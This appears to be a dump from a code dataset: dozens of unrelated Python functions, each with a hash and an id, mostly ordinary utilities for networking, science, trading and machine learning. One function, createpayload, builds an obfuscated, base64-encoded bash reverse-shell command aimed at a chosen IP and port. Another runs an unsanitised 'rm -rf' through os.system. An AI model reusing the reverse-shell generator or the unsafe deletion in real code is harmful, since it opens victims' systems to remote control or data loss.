content stringlengths 35 762k | sha1 stringlengths 40 40 | id int64 0 3.66M |
|---|---|---|
def bits_to_netmask(bits):
    """Convert a prefix length to a dotted-quad netmask string.

    Args:
        bits ('int'): prefix length to convert, e.g. bits = 24

    Returns:
        Netmask string such as '255.255.255.0'
    """
    shift = 32 - bits
    mask = (0xffffffff >> shift) << shift
    # Peel off the four octets from most to least significant.
    octets = ((mask >> offset) & 0xff for offset in (24, 16, 8, 0))
    return '.'.join(str(octet) for octet in octets)
from typing import Optional
from typing import Tuple
from typing import Type
import random
def random_array_spec(
    shape: Optional[Tuple[int, ...]] = None,
    name: Optional[Text] = None,
    dtype: Optional[Type[np.floating]] = None,
    minimum: Optional[np.ndarray] = None,
    maximum: Optional[np.ndarray] = None) -> specs.BoundedArray:
  """Build a BoundedArray spec, randomizing every part left unspecified."""
  shape = shape or random_shape()
  name = name or random_string()
  dtype = dtype or random.choice([np.float32, np.float64])
  if minimum is None:
    # Random lower bound, scaled by a random factor in [0, 10].
    minimum = (np.random.random(size=shape) * random.randint(0, 10)).astype(dtype)
  if maximum is None:
    # Upper bound is offset from the minimum so maximum >= minimum holds.
    maximum = (np.random.random(size=shape) * random.randint(0, 10) + minimum).astype(dtype)
  return specs.BoundedArray(shape, dtype, minimum, maximum, name)
def _clamp_angle(angle: Angle) -> Angle:
    """
    Certain angles in the game should be prohibited because they are not funny
    to play. The Function checks if angle is in the forbidden area and adjusts
    the angle.
    """
    # Half-widths of the forbidden bands: 30 deg around the horizontal
    # directions (0/180/360 deg) and 15 deg around the vertical ones (90/270).
    delta_x = deg2rad(30.0)
    delta_y = deg2rad(15.0)
    # NOTE(review): this aliases the input rather than copying it, so setting
    # new_angle.value below also mutates the caller's Angle — confirm intended.
    new_angle = angle
    # Each branch clamps the angle to the nearest edge of the forbidden band
    # it falls into; _is_bigger/_is_smaller presumably test membership in the
    # band on one side of the reference angle (TODO confirm their semantics).
    if _is_bigger(angle.value, deg2rad(0.0), delta_x):
        new_angle.value = deg2rad(0.0) + delta_x
    elif _is_smaller(angle.value, deg2rad(90.0), delta_y):
        new_angle.value = deg2rad(90.0) - delta_y
    elif _is_bigger(angle.value, deg2rad(90.0), delta_y):
        new_angle.value = deg2rad(90.0) + delta_y
    elif _is_smaller(angle.value, deg2rad(180.0), delta_x):
        new_angle.value = deg2rad(180.0) - delta_x
    elif _is_bigger(angle.value, deg2rad(180.0), delta_x):
        new_angle.value = deg2rad(180.0) + delta_x
    elif _is_smaller(angle.value, deg2rad(270.0), delta_y):
        new_angle.value = deg2rad(270.0) - delta_y
    elif _is_bigger(angle.value, deg2rad(270.0), delta_y):
        new_angle.value = deg2rad(270.0) + delta_y
    elif _is_smaller(angle.value, deg2rad(360.0), delta_x):
        new_angle.value = deg2rad(360.0) - delta_x
    return new_angle
def delete(where, item_id):
    """Returns True if successful; otherwise, False"""
    target_uri = uri % (where, str(item_id))
    http = httplib2.Http()
    response, content = http.request(target_uri, method="DELETE", headers=headers)
    succeeded = response["status"] == "204"
    return succeeded, response, content
def calculate_pair_true_positive(docs, dataset_prefix, target_event_types=None):
    """Count true-positive event pairs directly from doc-level annotations.

    We need this because in generating trigger candidates, we heuristically
    reject some candidates, so we cannot calculate the true positive from the
    candidates; we need to go back to the doc level annotations.

    :type docs: list[nlplingo.text.text_theory.Document]
    :type dataset_prefix: str
    :type target_event_types: set[str] # This allows you to just test on some types, e.g. when you want to train on known types and test on novel types
    :return: number of within-type event pairs, summed over all event types
    """
    event_count = defaultdict(int)
    for doc in docs:
        for event in doc.events:
            if target_event_types is None or event.label in target_event_types:
                event_count[event.label] += 1
    pair_true_positive = 0
    for et in event_count:
        print('In {} docs: num# {}={}'.format(dataset_prefix, et, event_count[et]))
        count = event_count[et]
        # n*(n-1)/2 pairs per type; integer division keeps the count an int
        # (true division returned a float under Python 3).
        pair_true_positive += (count * (count - 1)) // 2
    return pair_true_positive
import time
def getXYforPlanet(time_et, planet, camera, observer=''):
    """
    Compute the (x, y) detector position of a planet within a camera
    field-of-view at ephemeris time ``time_et``.

    Returns (time_et, x, y, size) when the planet is visible, where ``size``
    is the apparent size of the planet in pixels; returns
    (False, False, False, False) when it is not visible.
    Routine is tested for planet_name=Earth.
    """
    camera_id = spiceypy.bodn2c(camera)
    #
    # In case we do not have an SPK for the camera, observe from the camera.
    #
    if not observer:
        observer = camera
    r_planet = (spiceypy.bodvrd(planet, 'RADII', 3))[1][0]
    #
    # get instrument related info
    #
    (shape, frame, bsight, vectors, bounds) = spiceypy.getfov(camera_id,
                                                              100)
    # Rotate the FOV corner vectors into J2000 at the requested epoch.
    mat = spiceypy.pxform(frame, 'J2000', time_et)
    for bs in range(0, 4):
        bounds[bs, :] = spiceypy.mxv(mat, bounds[bs, :])
    [pos, ltime] = spiceypy.spkpos(planet, time_et, 'J2000',
                                   'LT+S', observer)
    visible = spiceypy.fovray(camera, pos, 'J2000', 'S', 'MPO',
                              time_et)
    x = 0.0
    y = 0.0
    size = 0.0
    #
    # only get detector position, if target is visible
    #
    if visible:
        hit = []
        for p in range(0, 4):
            #
            # compute the plane that is build up by the coordinate origin and two FOV corner vectors
            #
            plane = spiceypy.psv2pl([0, 0, 0], bounds[p, :],
                                    bounds[(p + 1) % 4, :])
            #
            # compute the projection of the target vector onto that plane
            #
            vout = (spiceypy.unorm(spiceypy.vprjp(pos, plane)))[0]
            #
            # calculate the angle between this vector and the original corner vectors
            #
            alpha = spiceypy.vsep(bounds[p, :], vout)
            beta = spiceypy.vsep(bounds[(p + 1) % 4, :], vout)
            #
            # the ratio of these angles also give the ratio of the detector on the edge
            # of the field of view, in a first approximation, average of the two opposite
            # FOV corner values: these are the x,y coordinates on the detector
            hit.append(1024 * alpha / (alpha + beta))
        # get intersection of the points
        (x, y) = findIntersection(hit[0], 0, hit[1], 1023, 0,
                                  hit[1], 1023, hit[2])
        size = 2 * r_planet * 500 / (
            np.tan(35. * 2 * np.pi / 360.) * spiceypy.vnorm(pos))
    else:
        print('Planet {} not visible by {} at {}'.format(planet, camera, spiceypy.et2utc(time_et, 'ISOC', 1, 25)))
        return (False, False, False, False)
    # BUG FIX: the original returned the `time` module object instead of the
    # epoch that was evaluated; return the ephemeris time argument.
    return (time_et, x, y, size)
def change_format(df):
    """
    Normalize column dtypes: parse 'date' as datetime and cast the OHLCV
    columns to numeric values.
    """
    numeric_columns = ['open', 'high', 'low', 'close', 'volume']
    df['date'] = pd.to_datetime(df['date'])
    df[numeric_columns] = df[numeric_columns].apply(pd.to_numeric)
    return df
from functools import reduce
def _get_cell_nodes(G, cell_idx):
"""Get array of nodes for a cell."""
# To get face nodes in MRST:
# (The second column in cells_faces are cell indices)
# >> G.faces.nodes(G.faces.nodePos(cell_idx) : G.faces.nodePos(cell_idx+1)-1, 1)
cell_faces = G.cells.faces[G.cells.facePos[cell_idx,0]:G.cells.facePos[cell_idx+1,0],0]
# The iterator returns nodes for every cell face.
# The union of these nodes contain the unique nodes for the cell.
# = face1_nodes U face2_nodes U ...
return reduce(
np.union1d,
(G.faces.nodes[
G.faces.nodePos[face_idx,0]:G.faces.nodePos[face_idx+1,0]
] for face_idx in cell_faces)
) | d5cc87478bf38e1a3e489af593eea562dc60e0b8 | 3,628,407 |
import base64
def b64_receipt_to_full_service_receipt(b64_string: str) -> dict:
    """Convert a b64-encoded protobuf Receipt into a full-service receipt object"""
    raw = base64.b64decode(b64_string)
    receipt = external_pb2.Receipt.FromString(raw)
    # Serialize the nested protobuf fields to hex strings, integers to
    # decimal strings, as the full-service API expects.
    amount = {
        "object": "amount",
        "commitment": receipt.amount.commitment.data.hex(),
        "masked_value": str(int(receipt.amount.masked_value)),
    }
    return {
        "object": "receiver_receipt",
        "public_key": receipt.public_key.SerializeToString().hex(),
        "confirmation": receipt.confirmation.SerializeToString().hex(),
        "tombstone_block": str(int(receipt.tombstone_block)),
        "amount": amount,
    }
from pathlib import Path
def main(file: str = "", action: str = "") -> int:
    """Entry point: run the requested action against the given ROM file."""
    if not file:
        return usage()
    # Resolve shell variables and ~ in the user-supplied path.
    rom = Path(expandvars(file)).expanduser()
    handlers = {"check": check, "dump": dump}
    handler = handlers.get(action)
    if handler is not None:
        return handler(rom)
    return 0
def find_elements(node, xpath, allow_zero=True, allow_multiple=True):
    """Attempt to find child elements in a node by xpath. Raise exceptions if
    conditions are violated. Return a (possibly empty) list of elements."""
    matches = node.findall(xpath)
    count = len(matches)
    # Violations: empty result when at least one match is required, or
    # several results when at most one is allowed.
    zero_violation = count == 0 and not allow_zero
    multiple_violation = count > 1 and not allow_multiple
    if zero_violation or multiple_violation:
        raise AssertionError(f'Found {count} instances of {xpath} in {node}, which is not allowed')
    return matches
from typing import Type
def name(class_name: str, chain_class: Type[ChainAPI]) -> Type[ChainAPI]:
    """
    Produce a copy of the chain class configured with the given name.
    """
    configured = chain_class.configure(__name__=class_name)
    return configured
import json
def unlock(vault_path, key):
    """
    Unlock legacy vault and retrieve content.

    :param vault_path: path to the vault file
    :param key: passphrase; hashed via get_hash() to derive the AES key
    :return: decrypted vault content parsed from JSON
    :raises ValueError: if the authentication tag does not verify
    """
    # File layout: 16-byte nonce, 16-byte tag, remainder is the ciphertext.
    # `with` closes the file deterministically (replaces manual try/finally).
    with open(vault_path, "rb") as f:
        nonce, tag, ciphertext = [f.read(x) for x in (16, 16, -1)]
    # Unlock Vault with key; decrypt_and_verify raises if the tag mismatches
    cipher = AES.new(get_hash(key), AES.MODE_EAX, nonce)
    data = cipher.decrypt_and_verify(ciphertext, tag)
    return json.loads(data.decode("utf-8"))
from datetime import datetime
def module_build_from_modulemd(yaml):
    """
    Build and return an unsaved ModuleBuild from modulemd YAML; it is not
    written into the database, commit it yourself if necessary.
    """
    mmd = load_mmd(yaml)
    mbuild = ModuleBuild()
    # Identity fields come straight from the modulemd document.
    mbuild.name = mmd.get_module_name()
    mbuild.stream = mmd.get_stream_name()
    mbuild.version = mmd.get_version()
    mbuild.state = BUILD_STATES["ready"]
    mbuild.modulemd = yaml
    # Fixed bookkeeping values for the fabricated build.
    mbuild.koji_tag = None
    mbuild.batch = 0
    mbuild.owner = "some_other_user"
    mbuild.time_submitted = datetime(2016, 9, 3, 12, 28, 33)
    mbuild.time_modified = datetime(2016, 9, 3, 12, 28, 40)
    mbuild.time_completed = None
    mbuild.rebuild_strategy = "changed-and-after"
    return mbuild
def largest_rectangle_area(heights):
    """ return largest rectangle in histogram """
    # Monotonic stack of bar indices; -1 is a sentinel marking the left edge.
    pending = [-1]
    best = 0
    n = len(heights)
    for idx in range(n):
        # Pop every bar at least as tall as the current one: the current bar
        # is its right boundary and the new stack top its left boundary.
        while pending[-1] != -1 and heights[pending[-1]] >= heights[idx]:
            top = pending.pop()
            width = idx - pending[-1] - 1
            best = max(best, heights[top] * width)
        pending.append(idx)
    # Bars still on the stack extend to the right edge of the histogram.
    while pending[-1] != -1:
        top = pending.pop()
        width = n - pending[-1] - 1
        best = max(best, heights[top] * width)
    return best
import subprocess
def kill_lines(path):
    """
    Run sed over all files under *path* and delete leftovers from commented
    out cookie cutter code (lines consisting only of ` # - ` or ` // - `).

    :param path: directory tree to process recursively
    :return: exit status of the find/sed invocation (0 on success)
    :raises subprocess.CalledProcessError: if find/sed exits non-zero
    """
    # Raw string: '\s' in a plain literal is an invalid escape sequence.
    # Also avoid naming the local `re`, which shadows the regex module name.
    pattern = r'^\s*(#|//) -\s*$'
    # Escape the characters that are special inside a basic-regex sed address.
    for escape in "()/|":
        pattern = pattern.replace(escape, fr"\{escape}")
    sed_command = f"/{pattern}/d"
    print(f"removing kill lines | {sed_command} | @ { path }")
    # List-form call: no shell involved, arguments are passed verbatim.
    return subprocess.check_call(["find", path, "-type", "f", "-exec", "sed", "-i", sed_command, "{}", "+"])
def url_for(root, path, language=None):
    """If page at `path` exists, returns it's root-relative URL;
    otherwise throws an exception.

    :param root: page tree root supporting find_descendant()
    :param path: page path to resolve
    :param language: optional language prefix (skipped for the default one)
    :raises UnknownPathException: if no page exists at `path`
    """
    base_url = settings.BASE_URL
    if language and language != settings.DEFAULT_LANGUAGE:
        base_url += '%s/' % language
    node = root.find_descendant(path)
    if not node:
        raise UnknownPathException(path)
    slugs = node.get_slugs()
    if path != settings.DEFAULT_PAGE:
        # BUG FIX: a filter object is always truthy in Python 3, so the old
        # `if filter(bool, slugs):` check always passed; materialize a list
        # so the emptiness test is meaningful.
        cleaned_slugs = [slug for slug in slugs if slug]
        if cleaned_slugs:
            return base_url + '/'.join(cleaned_slugs) + '/'
    return base_url
import argparse
def get_args():
    """get command-line arguments"""
    parser = argparse.ArgumentParser(
        description='Argparse Python script',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    # Board state: nine characters, one per cell.
    parser.add_argument(
        '-s', '--state', metavar='str', type=str, default='.........',
        help='the state of the board (type str, default "........." [9 dots])')
    # Player making the move.
    parser.add_argument(
        '-p', '--player', metavar='str', type=str, default='',
        help='The player to modify the state (type str, valid "X" or "O", no default)')
    # Cell to modify, 1-based.
    parser.add_argument(
        '-c', '--cell', metavar='int', type=int, default=None,
        help='the cell to alter (type int, valid 1-9, default None)')
    return parser.parse_args()
def build_upload_dict(metadata, tags, project):
    """Assemble the metadata/tags/project dict in the shape the OneCodex backend expects."""
    upload_args = {}
    if metadata:
        # Backend expects snake_case metadata keys.
        upload_args["metadata"] = {snake_case(md_key): md_val
                                   for md_key, md_val in metadata.items()}
    if tags:
        upload_args["tags"] = tags
    if project:
        # Accept either a project object (use its id) or a bare id string.
        upload_args["project"] = getattr(project, "id", project)
    return upload_args
from typing import Any
async def books_in_category(category: str) -> Any:
    """Fetch every book from the database whose category matches *category*."""
    matching = [book for book in BOOKS if book.category == category]
    return matching
import json
def GetActivationIDsSince(since, limit=100):
    """
    Returns the activation IDs (including the namespace)
    """
    configs = GetDBConfigs()
    # CouchDB _find endpoint of the activations database.
    url = (configs['db_protocol'] + '://' + configs['db_host'] + ':' +
           configs['db_port'] + '/' + configs['db_prefix'] + 'activations/_find')
    headers = {
        'Content-Type': 'application/json',
    }
    # Select activations whose start time is at or after `since`.
    query = {
        "selector": {
            "start": {
                "$gte": since
            }
        },
        "limit": limit
    }
    auth = '%s:%s' % (configs['db_username'], configs['db_password'])
    res = request('POST', url, body=json.dumps(query), headers=headers, auth=auth)
    doc = json.loads(res.read())
    return [entry['_id'] for entry in doc["docs"]]
def getOffset(viewID=DEFAULT_VIEW):
    """getOffset(string): -> (double, double)
    Returns the x and y offset of the center of the current view.
    """
    # Delegates to the generic TraCI getter for the view-offset variable.
    return _getUniversal(tc.VAR_VIEW_OFFSET, viewID) | bfcdc714bf708b839bc3207c10096f793274a4d6 | 3,628,421 |
import scipy
def laplacian_power(k: int):
    """Compute the coefficients of x^n, x^{n - 1}y, ..., y^n for the k-th power of the Laplacian."""
    # (x^2 + y^2)^k = sum_{i = 0}^k {k choose i} x^{2i} y^{2(k - i)}:
    # binomial coefficients sit at the even positions, zeros at the odd ones.
    coefficients = np.zeros(2 * k + 1)
    coefficients[0::2] = scipy.special.binom(k, np.arange(k + 1))
    return coefficients
from typing import Iterable
from typing import Any
def _as_valid_media_array(x: Iterable[Any]) -> np.ndarray:
    """Converts to ndarray (if not already), and checks validity of data type."""
    arr = np.asarray(x)
    if arr.dtype == bool:
        # Map booleans onto the full uint8 range (False -> 0, True -> 255).
        arr = arr.astype(np.uint8) * np.iinfo(np.uint8).max
    _as_valid_media_type(arr.dtype)
    return arr
def docker_vm_is_running():
    """Using VBoxManage is 0.5 seconds or so faster than Machine."""
    output = check_output_demoted(['VBoxManage', 'list', 'runningvms'])
    # VBoxManage lists each running VM with its name in double quotes.
    needle = '"{}"'.format(constants.VM_MACHINE_NAME)
    return any(needle in line for line in output.splitlines())
def fixture_frame_bucket() -> FrameBucket:
    """Provide a fresh frame version bucket instance."""
    bucket = FrameBucket()
    return bucket
def _convert_asset_for_get_list_result(asset):
    """Converts an EarthEngineAsset to the format returned by getList."""
    # Rename 'name' to 'id' and map the asset type through the legacy
    # converter; assets without a type default to 'Unknown'.
    field_map = {
        'name': 'id',
        'type': ('type', _convert_asset_type_for_get_list_result),
    }
    return _convert_dict(asset, field_map, defaults={'type': 'Unknown'})
def update_netbox_object(nb_obj, data, check_mode):
    """Update a Netbox object.
    :returns tuple(serialized_nb_obj, diff): tuple of the serialized updated
        Netbox object and the Ansible diff.
    """
    current = nb_obj.serialize()
    desired = {**current, **data}
    if current == desired:
        # Nothing would change: report the current state with no diff.
        return current, None
    # Collect only the keys whose values actually differ for the diff.
    changed_keys = [key for key in data if current[key] != desired[key]]
    data_before = {key: current[key] for key in changed_keys}
    data_after = {key: desired[key] for key in changed_keys}
    if not check_mode:
        nb_obj.update(data)
        desired = nb_obj.serialize()
    diff = _build_diff(before=data_before, after=data_after)
    return desired, diff
def rle_1d(arr):
    """Return the length, starting position and value of consecutive identical values.

    Parameters
    ----------
    arr : sequence
        Array of values to be parsed.

    Returns
    -------
    (values, run lengths, start positions)
    values : np.array
        The values taken by arr over each run
    run lengths : np.array
        The length of each run
    start position : np.array
        The starting index of each run

    Examples
    --------
    >>> a = [1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3]
    >>> rle_1d(a)
    (array([1, 2, 3]), array([2, 4, 6]), array([0, 2, 6]))
    """
    values = np.asarray(arr)
    n = len(values)
    if n == 0:
        warn("run length array empty")
        return None, None, None
    # Pairwise-unequal marks run boundaries (string safe).
    change = np.array(values[1:] != values[:-1])
    # Indices of the last element of each run (must include the final one).
    ends = np.append(np.where(change), n - 1)
    lengths = np.diff(np.append(-1, ends))
    starts = np.cumsum(np.append(0, lengths))[:-1]
    return values[ends], lengths, starts
def get_time_until_next_departure(trip_call=None):
    """Gets the time until the departure from the next station in minutes
    """
    # Fetch the trip data lazily if the caller did not supply it.
    trip = get_trip() if trip_call is None else trip_call
    eva = get_next_station_eva_number(trip_call=trip)
    return get_time_until_departure(evaNr=eva, trip_call=trip)
def generateMessage(rotation, tiltRight, tiltLeft, eyeLeft, blinkLeft, blinkRight, eyeRight):
    """Pack the head/eye control values into a list of ints, in wire order."""
    fields = (rotation, tiltRight, tiltLeft, eyeLeft,
              blinkLeft, blinkRight, eyeRight)
    return [int(value) for value in fields]
def compute_performance_metrics(y_true, y_pred):
    """ Compute precision, recall, and f1 score.

    y_true: true label
    y_pred: predicted label
    Labels are not hot encoded

    Return a dictionary containing Accuracy, Precision, Recall, F1 Score
    (samples, macro, weighted) and Hamming Loss
    """
    # BUG FIX: the module previously did `from re import M`, which binds the
    # regex MULTILINE flag — every M.*_score call raised AttributeError.
    # The intended alias is the sklearn metrics module.
    import sklearn.metrics as M
    # whether binary or multi-class classification
    if len(np.unique(y_true)) == 2:
        average_case = 'binary'
    else:
        average_case = 'macro'
    # NOTE(review): average="samples" and average="binary" below require
    # multilabel / binary inputs respectively and will raise for plain
    # multiclass labels — confirm the expected label format with callers.
    scores = {
        "Accuracy": M.accuracy_score(y_true, y_pred),
        "Precision": M.precision_score(y_true, y_pred, average=average_case),
        "Recall": M.recall_score(y_true, y_pred, average=average_case),
        "F1_samples": M.f1_score(y_true, y_pred, average="samples"),
        "F1_macro": M.f1_score(y_true, y_pred, average="macro"),
        "F1_micro": M.f1_score(y_true, y_pred, average="micro"),
        "F1_weighted": M.f1_score(y_true, y_pred, average="weighted"),
        "F1_binary": M.f1_score(y_true, y_pred, average="binary"),
        "Hamming Loss": M.hamming_loss(y_true, y_pred),
    }
    return scores
def metablock(parsed):
    """
    Remove HTML tags, entities and superfluous characters from meta blocks.
    """
    # Drop newlines, collapse runs of whitespace, and tidy spaces before commas.
    no_newlines = parsed.replace("\n", "")
    collapsed = " ".join(no_newlines.split()).replace(" ,", ",")
    return strip_tags(decode_entities(collapsed))
def unit_vector(vector):
    """ Returns the unit vector of the vector.

    The zero vector is mapped to a zero vector of the same shape instead of
    dividing by zero.
    """
    vec_norm = np.linalg.norm(vector)
    if vec_norm == 0:
        return vector * 0
    # Reuse the norm computed above (the original recomputed it here).
    return vector / vec_norm
def app_metadata_json():
    """Create metadata.json content for a test app."""
    return dict(
        description="A test app that does not really exist.",
        title="Test App",
        version="1.0.0",
        authors="aiidalab",
        logo="img/logo.png",
        state="development",
    )
import os
def align_to_target(
    infile=None,
    outfile=None,
    template=None,
    interpolation='cubic',
    asvelocity=True,
    overwrite=False,
    axes=None
    ):
    """
    Align one cube to another, creating a copy. Right now a thin
    wrapper to imregrid used mostly to avoid exposing CASA directly
    into the postprocessHandler. Might evolve in the future.

    :param infile: cube to regrid
    :param outfile: destination image
    :param template: image defining the target grid
    :param axes: axes passed to imregrid; defaults to [-1] (all axes)
    :return: True on success, False on any validation failure
    """
    # BUG FIX: axes previously defaulted to the mutable list [-1], which is
    # shared across calls; use None and substitute the real default here.
    if axes is None:
        axes = [-1]
    if infile is None or template is None or outfile is None:
        logger.error("Missing required input.")
        return(False)
    if os.path.isdir(infile) == False and os.path.isfile(infile) == False:
        logger.error("Input file missing - "+infile)
        return(False)
    if os.path.isdir(template) == False and os.path.isfile(template) == False:
        logger.error("Template file missing - "+template)
        return(False)
    if os.path.isfile(outfile) or os.path.isdir(outfile):
        if overwrite:
            os.system('rm -rf '+outfile)
        else:
            logger.error("Output exists and overwrite set to false - "+outfile)
            return(False)
    casaStuff.imregrid(
        imagename=infile,
        template=template,
        output=outfile,
        interpolation=interpolation,
        asvelocity=asvelocity,
        axes=axes,
        overwrite=True)
    return(True)
def get_text(original, token, replace):
    """Convenience function for getting the text to use for a match when
    formatting.

    If ``replace`` is False, returns the part of ``original`` between
    ``token.startchar`` and ``token.endchar``. If ``replace`` is True, returns
    ``token.text``.
    """
    return token.text if replace else original[token.startchar:token.endchar]
def LoadUCursor(fc, flist=None):
    """Open an arcpy UpdateCursor over all of fc's fields plus any extras.

    Important note: the function creates two outputs and only opens the
    cursor -- there is no "with" block to close it automatically, so remember
    to delete the cursor and field list when finished.
    """
    field_names = [field.name for field in arcpy.ListFields(fc)]
    if flist:
        field_names.extend(flist)
    cursor = arcpy.da.UpdateCursor(fc, field_names)
    # Return the cursor's own field list (may differ from field_names order).
    return cursor, cursor.fields
import torch
def cal_region_id(data, fps_index, result_path, save=True):
    """ calculate and save region id of all the points
    Input:
        data: (B,num_points,3) tensor, point cloud, num_points=1024
        fps_index: (num_regions,) ndarray, center idx of the 32 regions
        result_path: path to save file
    Return:
        region_id: (num_points,) ndarray, record each point belongs to which region
    """
    # Centroids of each region: (B, num_regions, 3).
    centroids = data[:, fps_index, :]
    # Pairwise squared distances point->centroid: (B, num_points, num_regions), here B=1.
    dists = square_distance(data, centroids)
    # Each point belongs to its nearest centroid's region.
    region_id = torch.argmin(dists, dim=2).squeeze().cpu().numpy()
    if save:
        np.save(result_path + "region_id.npy", region_id)  # (num_points,)
    return region_id
def is_perfect_piggy(turn_score):
    """Returns whether the Perfect Piggy dice-swapping rule should occur."""
    # BEGIN PROBLEM 4
    # A score of 1 never triggers the rule; any other perfect square or
    # perfect cube does. (Removed the leftover "*** REPLACE THIS LINE ***"
    # placeholder string and flattened the redundant if/elif/else chain.)
    if turn_score == 1:
        return False
    return is_perfect_square(turn_score) or is_perfect_cube(turn_score)
    # END PROBLEM 4
from freqtrade.worker import Worker
from typing import Dict
from typing import Any
def start_trading(args: Dict[str, Any]) -> int:
    """
    Main entry point for trading mode
    """
    worker = None
    try:
        worker = Worker(args)
        worker.run()
    except KeyboardInterrupt:
        logger.info('SIGINT received, aborting ...')
    except Exception as e:
        logger.error(str(e))
        logger.exception("Fatal exception!")
    finally:
        # Always give the worker a chance to shut down cleanly.
        if worker:
            logger.info("worker found ... calling exit")
            worker.exit()
    return 0
def make_pairs(values):
    """
    Build a list of CoupledPair objects from an iterable; each input type is
    handled differently.

    A CoupledPair is simply wrapped in a list. A list or set is walked
    recursively and the resulting pairs concatenated. A tuple becomes a single
    CoupledPair from its first two items. A dict yields one CoupledPair per
    key/value item -- by far the safest input form.

    Parameters
    ----------
    value: CoupledPair, list, set, tuple or dict

    Returns
    -------
    list of CoupledPair
    """
    if isinstance(values, CoupledPair):
        return [values]
    if isinstance(values, (list, set)):
        pairs = []
        for item in values:
            pairs.extend(make_pairs(item))
        return pairs
    if isinstance(values, tuple):
        return [CoupledPair(values[0], values[1])]
    if isinstance(values, dict):
        return [CoupledPair(key, value) for key, value in values.items()]
    raise TypeError(
        "make_pairs only accepts CoupledPair, list, set, tuple or dict"
    )
def directed_decision_free_path(cbn: CausalBayesianNetwork, start_node: str, end_node: str) -> bool:
    """
    Checks to see if a directed decision free path exists
    """
    for node in (start_node, end_node):
        if node not in cbn.nodes():
            raise KeyError(f"The node {node} is not in the (MA)CID")
    # Only interior nodes count: the path's own endpoints may be decisions.
    all_paths = find_all_dir_paths(cbn, start_node, end_node)
    return any(cbn.decisions.isdisjoint(path[1:-1]) for path in all_paths)
def post_detail(request, year, month, day, post):
    """
    View rendering the detail page for a single Post, including its active
    comments, a comment form, and a list of similar posts.
    """
    post = get_object_or_404(Post, slug=post,
                             status='published',
                             publish__year=year,
                             publish__month=month,
                             publish__day=day)
    # List of active comments for this post
    comments = post.comments.filter(active=True)
    new_comment = None
    if request.method == 'POST':
        # A comment was submitted
        comment_form = CommentForm(data=request.POST)
        if comment_form.is_valid():
            # Create the Comment object but do not save it to the database yet
            new_comment = comment_form.save(commit=False)
            # Attach the current post to the comment
            new_comment.post = post
            # Save the comment to the database
            new_comment.save()
    else:
        comment_form = CommentForm()
    # List of similar posts, ranked by number of shared tags then recency
    post_tags_ids = post.tags.values_list('id', flat=True)
    similar_posts = Post.published.filter(tags__in=post_tags_ids).exclude(id=post.id)
    similar_posts = similar_posts.annotate(same_tags=Count('tags')).order_by('-same_tags', '-publish') [:4]
    return render(request, 'blog/post/detail.html', {'post': post,
                                                     'comments':comments,
                                                     'new_comment':new_comment,
                                                     'comment_form': comment_form,
                                                     'similar_posts': similar_posts}) | 60a8930b673c4f99c43075cff5c2fe1665ccede0 | 3,628,443 |
import struct
def calc_genkey_pubkey_digest(mode, key_id, public_key, temp_key, sn, other_data=None):
    """
    Replicate the internal TempKey calculations of the GenKey command in
    digest mode.
    """
    if len(public_key) != 64:
        raise ValueError('public_key must be 64 bytes')
    if len(temp_key) != 32:
        raise ValueError('temp_key must be 32 bytes')
    parts = [temp_key, b'\x40']  # GenKey Opcode
    if mode & 0x10:
        # Slot is storing a public key directly, use OtherData for Mode and KeyID
        if len(other_data) != 3:
            raise ValueError('other_data must be 3 bytes')
        parts.append(other_data)
    else:
        # Slot is storing a private key and the public key is generated
        parts.append(struct.pack("B", mode))
        parts.append(struct.pack("<H", key_id))
    # Serial-number bytes, zero padding, then the public key itself.
    parts.append(sn[8:9])
    parts.append(sn[0:2])
    parts.append(b'\x00' * 25)
    parts.append(public_key)
    return sha256(b''.join(parts)).digest()
import os
def createpayload(ip, port):
    """Create base64 payload for a bash reverse shell to ip:port."""
    # Rewrite our ip in HEX (https://github.com/D4Vinci/Cuteit)
    hexip = Cit.lib(ip)
    payload = "bash -i >& /dev/tcp/" + str(hexip.hex) + "/" + port + " 0>&1"
    # SECURITY FIX: encode in-process with the base64 module instead of
    # interpolating ip/port into an os.popen shell command line (shell
    # injection). b64encode produces no trailing newline, matching the old
    # printf | base64 | tr -d '\n' pipeline byte-for-byte.
    import base64
    return base64.b64encode(payload.encode()).decode()
def create_repeated_leaf_node(parent_index,
                              values):
    """Creates a repeated PrensorField.

    Args:
        parent_index: a list of integers that is converted to a 1-D int64 tensor.
        values: a list of whatever type that the field represents.

    Returns:
        A PrensorField with the parent_index and values set appropriately.
    """
    parent_tensor = tf.constant(parent_index, dtype=tf.int64)
    values_tensor = tf.constant(values)
    return prensor.LeafNodeTensor(parent_tensor, values_tensor, True)
from datetime import datetime, timedelta
import time
import functools
def api_rate_limit(func):
    """Decorator to limit how often a method can be called.

    BUG FIX: `timedelta` was used without being imported (only `datetime`
    was), so the wrapper raised NameError on its first call.
    """
    @functools.wraps(func)
    def inner(self, *args, **kwargs):
        # If the oldest recorded request is under a second old, the window is
        # full; pause before issuing another request.
        if self._previous_request_timestamps[0] >= datetime.now() - timedelta(seconds=1):
            print("API Rate Limiting... 10 Requests per second")
            time.sleep(self.api_rate_limit_delay)  # Rate limit to less than 10 API requests per second
        self._previous_request_timestamps.append(datetime.now())
        return func(self, *args, **kwargs)
    return inner
def calc_Ti(Te, Tg, n):
    """Calculate the infectious period from Te, Tg and n."""
    latent_to_generation = Tg - Te
    return latent_to_generation * 2.0 * n / (n + 1.0)
def function_from_graph_def(graph_def, inputs, outputs, captures=None):
    """Creates a ConcreteFunction from a GraphDef.

    Args:
        graph_def: A GraphDef to make a function out of.
        inputs: A Tensor name or nested structure of names in `graph_def` which
            should be inputs to the function.
        outputs: A Tensor name or nested structure of names in `graph_def` which
            should be outputs of the function.
        captures: (Optional) A dictionary mapping node names in `graph_def` that
            should be captured as inputs to tensors containing the value of the
            captured inputs.

    Returns:
        A ConcreteFunction.
    """
    # Import the GraphDef into whatever graph is current when wrap_function
    # traces this callable.
    def _imports_graph_def():
        importer.import_graph_def(graph_def, name="")
    graph = ops.get_default_graph()
    if captures is not None:
        # Register each capture on the outer graph; ":0" selects the node's
        # first output tensor.
        for c in captures:
            graph.add_capture(captures[c], graph.get_tensor_by_name(str(c) + ":0"))
    wrapped_import = wrap_function(_imports_graph_def, [])
    import_graph = wrapped_import.graph
    # Prune down to a ConcreteFunction with exactly the requested signature,
    # resolving tensor names inside the imported graph.
    return wrapped_import.prune(
        nest.map_structure(import_graph.as_graph_element, inputs),
        nest.map_structure(import_graph.as_graph_element, outputs)) | 852810bcffb067b5d7aad47d58395afe7c3bc0ac | 3,628,449 |
